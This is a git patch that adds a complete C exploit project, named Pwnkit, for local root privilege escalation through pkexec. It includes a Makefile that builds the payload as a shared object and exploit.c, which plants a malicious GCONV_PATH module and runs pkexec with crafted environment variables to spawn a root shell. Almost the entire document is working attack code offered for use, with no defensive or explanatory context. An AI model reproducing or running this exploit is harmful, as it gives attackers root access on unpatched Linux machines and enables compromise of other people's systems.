From 2bc2c0d48a1fcedb6f1d0eaf4c896a366e6e6a1b Mon Sep 17 00:00:00 2001
From: Ruthenic <mdrakea3@tutanota.com>
Date: Wed, 26 Jan 2022 16:48:54 -0500
Subject: [PATCH] Init

---
 .gitignore             |  1 +
 Makefile               | 13 +++++++
 src/exploit.c          | 79 ++++++++++++++++++++++++++++++++++++++++++
 src/testGconvPayload.c |  7 ++++
 4 files changed, 100 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 Makefile
 create mode 100644 src/exploit.c
 create mode 100644 src/testGconvPayload.c

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..1fcb152
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+out
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..22404a1
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,13 @@
+VERSION = "\"0.3.2\\n© Ruthenic, 2021\""
+
+CC ?= gcc
+target ?= $(shell ${CC} -dumpmachine)
+CC_FLAGS ?=
+
+.PHONY: all debug
+all: 
+	gcc -shared src/exploit.c -o out/pwnkit.so -Wl,-soname,libservice.so -Wl,-e,main -fPIC
+
+debug: CC_FLAGS:=-g -O0 -v ${CC_FLAGS}
+debug: all
+
diff --git a/src/exploit.c b/src/exploit.c
new file mode 100644
index 0000000..e8266f1
--- /dev/null
+++ b/src/exploit.c
@@ -0,0 +1,79 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; //jank to get this working
+
+void print(const char string[]) {
+	fwrite(string, sizeof(char), strlen(string) + 1, stdout);
+	fwrite("\n", sizeof(char), strlen("\n"), stdout);
+}
+
+void gconv() {} //gconv thing
+
+void gconv_init() {
+	print("pwned lol !");
+	setuid(0);
+	seteuid(0);
+	setgid(0);
+	setegid(0);
+	char *shellArgv[] = {"sh", NULL};
+	execv("/bin/sh", shellArgv);
+}
+
+void setup(char *argv[]) {
+	mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
+	mkdir("pwn", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
+	FILE *fp = fopen("GCONV_PATH=./pwn", "w");
+	struct stat buf;
+	fstat(fileno(fp), &buf);
+	fchmod(fileno(fp), buf.st_mode | S_IXUSR | S_IXGRP | S_IXOTH );
+	fclose(fp);
+	system("/bin/cp pwnkit.so pwn/pwnkit.so"); //i cant be fucked
+	fp = fopen("pwn/gconv-modules", "w");
+	char *gconv = "module PWNKIT// INTERNAL pwnkit 2\n"
+				  "module INTERNAL PWNKIT// pwnkit 2";
+	fputs(gconv, fp);
+	fclose(fp);
+}
+
+void clean() {
+	remove("GCONV_PATH=./pwn");
+	rmdir("GCONV_PATH=.");
+	remove("pwn/pwnkit.so");
+	remove("pwn/gconv-modules");
+	rmdir("pwn");
+}
+
+void runAndClean(const char *env[], const char *arg[]) {
+	int pid = fork();
+	if (pid == 0) execve("/usr/bin/pkexec", arg, env);
+	else {
+		waitpid(pid, NULL, 0);
+		print("[Pwnkit] Cleaning up..");
+		clean();
+	}
+}
+
+int main(int argc, char *argv[]) {
+	print("[Pwnkit] Setting up directory structure..");
+	setup(argv);
+	print("[Pwnkit] Setting up environment variables..");
+	const char *env[] = {
+		"pwn",
+		"PATH=GCONV_PATH=.",
+		"CHARSET=pwnkit",
+		"SHELL=pwn",
+		"GIO_USE_VFS=",
+		NULL
+	};
+	const char *args[] = { NULL };
+	print("[Pwnkit] Pwning pkexec..");
+	runAndClean(env, args);
+	_exit(0);
+}
diff --git a/src/testGconvPayload.c b/src/testGconvPayload.c
new file mode 100644
index 0000000..82ebed7
--- /dev/null
+++ b/src/testGconvPayload.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(void) {
+  putenv("GCONV_PATH=.");
+  FILE *fp = fopen("exploit.c", "r,ccs=pwnkit");
+}